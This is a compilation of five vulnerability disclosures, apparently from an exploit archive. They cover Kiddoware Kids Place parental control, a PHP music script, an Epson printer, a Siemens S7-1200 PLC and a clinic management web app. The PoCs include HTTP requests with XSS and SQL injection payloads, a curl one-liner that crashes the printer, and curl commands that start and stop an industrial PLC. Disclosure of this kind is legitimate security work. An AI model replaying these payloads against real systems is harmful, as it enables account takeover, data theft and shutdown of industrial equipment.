<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230515-0 ><br />=======================================================================<br /> title: Multiple Vulnerabilities<br /> product: Kiddoware Kids Place Parental Control Android App<br /> vulnerable version: <=3.8.49<br /> fixed version: 3.8.50 or higher<br /> CVE number: CVE-2023-28153, CVE-2023-29078, CVE-2023-29079<br /> impact: High<br /> homepage: https://kiddoware.com<br /> found: 2022-09-29<br /> by: Fabian Densborn (Office Vienna)<br /> Bernhard Gründling (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult.<br /> SEC Consult is part of Eviden, an atos business<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Kiddoware is the world’s leading parental control solutions company<br />with a wide range of products and serving over 5 million families<br />worldwide. Kiddoware is committed in helping you to protect your kids<br />while providing you intelligence to be proactive about your childs’<br />online activities."<br /><br />Source: https://kiddoware.com/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides an update for the affected version(s) which<br />should be installed immediately.<br /><br />An in-depth security analysis performed by security professionals is<br />highly advised, to identify and resolve potential further critical security<br />issues.<br /><br />The issues identified in this application were part of our blog post<br />"The hidden costs of parental control apps" published a few months ago:<br />https://r.sec-consult.com/parents<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Login and registration returns password as MD5 hash<br />Login and registration requests return the unsalted MD5 hash<br />of the password. This indicates that the passwords are stored<br />in an insecure format at the server. Furthermore, MD5 hashing<br />should not be used anymore in modern applications.<br /><br /><br />2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)<br />The customizable name of the child's device can be used to<br />trigger a XSS payload in the parent web dashboard. Children<br />might be able to attack their parents' account.<br /><br /><br />3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)<br />All requests in the web dashboard are vulnerable to CSRF attacks.<br />The requests contain the device Id of the child device which must<br />be known to the attacker in order to successfully attack a child.<br />But the device Id is not considered a secret, as it is used in<br />the URL in some requests. An attacker could have obtained the Id<br />through the browser history.<br /><br /><br />4) Arbitrary File Upload to AWS S3 bucket<br />The web dashboard lets parents send files to the child's device.<br />The selected file is uploaded to an AWS S3 bucket and the returned<br />URL will be transmitted to the device which will then download it.<br />It is possible to send arbitrary files to the child's device and<br />thereby upload arbitrary files (size restriction ~10MB) to the<br />AWS S3 bucket. The returned link is publicly available, so it is<br />possible to use the server to spread malware.<br /><br /><br />5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)<br />The child can remove all restrictions temporarily without the parents noticing.<br /><br /><br /><br />Proof of concept:<br />-----------------<br />1) Login and registration returns password as MD5 hash<br />The "Change password" request looks as follows:<br />--------------------------------------------------------------------------------<br />POST /account/change_password/ HTTP/1.1<br />Host: kidsplace.kiddoware.com<br />Cookie: [...]<br />[...]<br /><br />old_password=c869123c&new_password=password&confirm_password=password<br />--------------------------------------------------------------------------------<br /><br />The response from the web server contains the hashed, unsalted password:<br />--------------------------------------------------------------------------------<br />{<br /> "error":null,<br /> "result":<br /> {<br /> "email":"xxxxx@example.com",<br /> "hashed_password":"5f4dcc3b5aa765d61d8327deb882cf99",<br /> "message":"Password successfully changed!"<br /> },<br /> "status":200<br />}<br />--------------------------------------------------------------------------------<br /><br />Proving this is an unsalted MD5 hash:<br /><br />$ echo -n "password" | md5sum -t<br />5f4dcc3b5aa765d61d8327deb882cf99 -<br /><br /><br />2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)<br />The device name can be changed by the child's account by sending a POST request<br />to the API with the pushDeviceConfig method. The following payload can be used as<br />a PoC to trigger an alert box on every page the device name is visible in the<br />parent dashboard. Children/attackers would be able to take over their parents'<br />accounts via this attack.<br /><br />--------------------------------------------------------------------------------<br />POST /v2/api/ HTTP/1.1<br />Host: kidsplace.kiddoware.com<br />Content-Type: application/json; charset=utf-8<br />Content-Length: 461<br />Accept-Encoding: gzip, deflate<br />User-Agent: okhttp/3.12.8<br />Connection: close<br /><br />{<br /> "method":"pushDeviceConfig",<br /> "id":null,<br /> "params":["a28fd8c5-2dcd-11ed-8a7f-0217330f2cf9",<br /> {<br /> "isGPSEnabled":false,"deviceGCMRegID":"",<br /> "deviceUserAgeRange":3,<br /> "deviceName":"\"><img src=x onerror=\"alert(1)\"/>",<br /> [...]<br /> }<br />}<br />--------------------------------------------------------------------------------<br /><br /><br />3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)<br />As an example, an attacker can abuse the CSRF vulnerability to download an<br />arbitrary file to a child's device. It is simply needed to create a form which<br />automatically submits on page load. If a parent is logged in the web dashboard<br />and visits this malicious site, the authenticated request will be sent and the<br />file specified in the URL parameter will be downloaded by the child's device.<br /><br />--------------------------------------------------------------------------------<br />POST /account/push_content/ HTTP/1.1<br />Host: kidsplace.kiddoware.com<br />Cookie: [...]<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Origin: https://kidsplace.kiddoware.com<br />Content-Length: 75<br />Connection: close<br /><br />url=https%3A%2F%2Fgoogle.de%2Findex.html&message=&deviceID=XXXXXXX<br />--------------------------------------------------------------------------------<br /><br /><br />4) Arbitrary File Upload to AWS S3 bucket<br />The web dashboard lets parents upload arbitrary files to the Kiddoware AWS S3 bucket<br />and push it to the child device.<br />--------------------------------------------------------------------------------<br />POST /account/push_content_file/ HTTP/1.1<br />Host: kidsplace.kiddoware.com<br />Cookie: [...]<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Content-Type: multipart/form-data; boundary=---------------------------27687116714103572458683268551<br />Origin: https://kidsplace.kiddoware.com<br />Content-Length: 296<br />[...]<br /><br />-----------------------------27687116714103572458683268551<br />Content-Disposition: form-data; name="push_file"; filename="eicar.com.txt"<br />Content-Type: text/plain<br /><br /><eicar-file><br />-----------------------------27687116714103572458683268551--<br />--------------------------------------------------------------------------------<br /><br />The upload of the eicar file worked without errors and could subsequently also be<br />downloaded via the returned link. So there is no antivirus scan on the uploaded files.<br /><br /><br />5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)<br />The child can disable the restrictions of the application without the parents noticing.<br />For this, the following steps are necessary:<br />a) If Android settings are blocked, reboot into Android Safe Mode.<br />b) Disable "Display over other apps" Permission for the app in Android settings.<br />c) After rebooting into normal mode, the child device can be used without restrictions.<br /><br />For example, previously locked apps can now be used. To notice the problem, the parent<br />has to check the parent's dashboard manually, a notification is not sent. If the child<br />turns the permission back on in the meantime, the bypass will go unnoticed.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and downloaded through Google Play store, which was<br />the most recent version available at the time of the test:<br />* 3.8.45<br /><br />Later on, version 3.8.49 (2022-10-25) has been verified to be vulnerable as well.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-11-23: Contacting vendor through kiddoware@kiddoware.com and support@kiddoware.com<br /> Asking for security contact.<br />2022-11-23: Response received, requesting advisory to be submitted to an employee mail.<br /> No encryption demanded. Advisory sent to vendor.<br />2022-11-28: Vendor informs about ongoing backend rewrites and removing some<br /> upload functionalities. Some fixes will be live by Q1 2023.<br /> Everything will be addressed by end of 01-04-2023.<br />2022-12-15: SEC Consult informs about upcoming blog post about parental control apps.<br />2022-12-15: Vendor states that most of the issues have already been fixed.<br />2022-12-16: Recheck of vulnerabilities shows that not all vulnerabilities<br /> have been sufficiently addressed. Vendor was informed.<br />2022-12-16: Vendor explains what security measures will be implemented and<br /> informs SEC Consult as soon as this is done.<br />2022-12-30: Vendor informs that fixes for the found vulnerabilities have been published.<br />2023-01-11: SEC Consult rechecks the vulnerabilities and found out that the applied<br /> patches are not sufficient. Again, informs the vendor about it.<br />2023-02-14: No response from vendor, reminder sent.<br />2023-02-14: Vendor informs SEC Consult that all issues have been resolved.<br />2023-03-10: Requesting CVE numbers.<br />2023-03-12: Assigned CVE number for "Disable child restriction" finding.<br />2023-03-31: Assigned CVE numbers for XSS and CSRF findings.<br />2023-05-15: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version which should be installed immediately through Google<br />Play store.<br />* Version: 3.8.50 or higher<br /><br /><br />Workaround:<br />-----------<br />No workaround available.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult is part of Eviden, an atos business<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part<br />of Eviden, an atos business. It ensures the continued knowledge gain of SEC<br />Consult in the field of network and application security to stay ahead of the<br />attacker. The SEC Consult Vulnerability Lab supports high-quality penetration<br />testing and the evaluation of new offensive and defensive technologies for our<br />customers. Hence our customers obtain the most current information about<br />vulnerabilities and valid recommendation about the risk profile of new<br />technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF F. Densborn, B. Gründling / @2023<br /><br /></code></pre>
<pre><code>## Title: GaanaGawaana - Music Platform PHP Script-1.0 XSS-Reflected<br />and SQLi Vulnerability<br />## Author: nu11secur1ty<br />## Date: 05.16.2023<br />## Vendor: https://www.codester.com/<br />## Software: https://www.codester.com/items/27270/gaanagawaana-music-platform-php-script<br />## Reference XSS: https://portswigger.net/web-security/cross-site-scripting<br />## Reference SQLi: https://portswigger.net/web-security/sql-injection<br /><br /><br />## Description:<br />XSS: The value of the q request parameter is copied into the HTML<br />document as text between TITLE tags. The payload<br />aw9rx</title><script>alert(1)</script>rg1m6 was submitted in the q<br />parameter. This input was echoed unmodified in the application's<br />response.<br />--------------------------------------------------------------------------------------------------------------------------------<br />SQLi: The q parameter appears to be vulnerable to SQL injection<br />attacks. The payloads 70346811' or 7218=7218-- and 18028207' or<br />8587=8593-- were each submitted in the q parameter. These two requests<br />resulted in different responses, indicating that the input is being<br />incorporated into a SQL query in an unsafe way.<br /><br />STATUS: CRITICAL Vulnerability<br /><br />[+]Exploit-XSS-test:<br />```XSS<br />GET /search?q=aw9rx%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3erg1m6 HTTP/2<br />Host: gaanagawaana.codesler.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="113", "Chromium";v="113"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br />```<br />[+]Response-XSS-test:<br />```<br />HTTP/2 200 OK<br />Cache-Control: no-store, max-age=0, no-cache<br />Date: Tue, 16 May 2023 06:39:12 GMT<br />Content-Type: text/html; charset=UTF-8<br />Server: Apache<br /><br /><html><br /><head><br /><title>aw9rx</title><script>alert(1)</script>rg1m6's Song Download,<br />Listen & Lyrics</title><br /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><br />```<br />--------------------------------------------------------------------<br /><br />[+]Payload-SQLi:<br />```SQLi<br />---<br />Parameter: q (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: q=-5722%' OR 2476=2476 AND 'nMde%'='nMde<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/codester/2023/GaanaGawaana-Music-Platform-PHP-Script-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/05/gaanagawaana-10-xss-reflected-sqli-for.html)<br /><br />## Time spend:<br />01:10:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2020-05-16<br /># Vendor Homepage: https://www.epson.es/<br /># Software Link :<br />https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w<br /># Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0<br /># Tested on: Linux/Windows<br /># Vulnerability Type: Denial of Service (DoS)<br /><br />1. Description<br /><br />The vulnerability occurs when 2 or more &'s are sent to the server in a row<br />("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown.<br /><br />2. Proof of Concept<br /><br />Request:<br /><br />curl -s "http://<br /><printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"<br /><br />3. Solution:<br /><br />This version product is deprecated.<br /><br />--><br /><br /></code></pre>
<pre><code># Exploit Title: Siemens SIMATIC S7-1200 CPU Start/Stop Command- Cross-Site Request Forgery<br /># Google Dork: inurl:/Portal/Portal.mwsl<br /># Date: 2022-03-24<br /># Exploit Author: RoseSecurity<br /># Vendor Homepage: https://www.siemens.com/global/en.html<br /># Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3<br /># Tested on: Kali Linux<br /># CVE: CVE-2015-5698<br /><br /><br /><br /># IP == PLC IP address<br /><br /># Start Command<br /><br />curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Start' \ 'http://<IP>/CPUCommands'<br /><br /># Stop Command<br /><br />curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Stop' \ 'http://<IP>/CPUCommands'<br /></code></pre>
<pre><code># Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)<br /># Date: 27-06-2019<br /># Exploit Author: Rafael Pedrero<br /># Vendor Homepage: https://bigprof.com<br /># Software Download Link :<br />https://bigprof.com/appgini/applications/online-clinic-management-system<br /># Version : 2.2<br /># Category: Webapps<br /># Tested on: Windows 7 64 Bits / Windows 10 64 Bits<br /># CVE :<br /># Category: webapps<br /><br /># Vulnerability Type: Stored Cross-Site Scripting<br /><br />1. Description<br /><br />Online Clinic Management System 2.2, does not sufficiently encode<br />user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)<br />vulnerability via the /clinic/medical_records_view.php, in FirstRecord<br />parameter, GET and POST request.<br /><br /><br />2. Proof of Concept<br /><br />GET:<br />http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=<br /><br />POST:<br />POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: multipart/form-data;<br />boundary=---------------------------1512016725878<br />Content-Length: 1172<br />Origin: https://127.0.0.1<br />Connection: keep-alive<br />Referer: https://127.0.0.1/clinic/medical_records_view.php<br />Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4;<br />online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]<br />Upgrade-Insecure-Requests: 1<br />Host: 127.0.0.1<br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="current_view"<br /><br />DVP<br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="SortField"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="SelectedID"<br /><br />1<br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="SelectedField"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="SortDirection"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="FirstRecord"<br /><br />"><script>alert(1);</script><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="NoDV"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="PrintDV"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="DisplayRecords"<br /><br />all<br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="patient"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="SearchString"<br /><br /><br />-----------------------------1512016725878--<br /><br /><br />1. Description<br /><br />Online Clinic Management System 2.2, does not sufficiently encode<br />user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)<br />vulnerability via the /clinic/patients_view.php, in FirstRecord parameter.<br /><br /><br />2. Proof of Concept<br /><br />http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=<br /><br /><br />And Reflected Cross-Site Scripting (XSS) too.<br /># Vulnerability Type: Reflected Cross-Site Scripting<br /><br />1. Description<br /><br />Online Clinic Management System 2.2, does not sufficiently encode<br />user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)<br />vulnerability via the /clinic/events_view.php, in FirstRecord parameter.<br /><br /><br />2. Proof of Concept<br /><br />http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=<br /><br /><br />1. Description<br /><br />Online Clinic Management System 2.2, does not sufficiently encode<br />user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)<br />vulnerability via the /clinic/disease_symptoms_view.php, in FirstRecord<br />parameter.<br /><br /><br />2. Proof of Concept<br /><br />http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=<br /><br /></code></pre>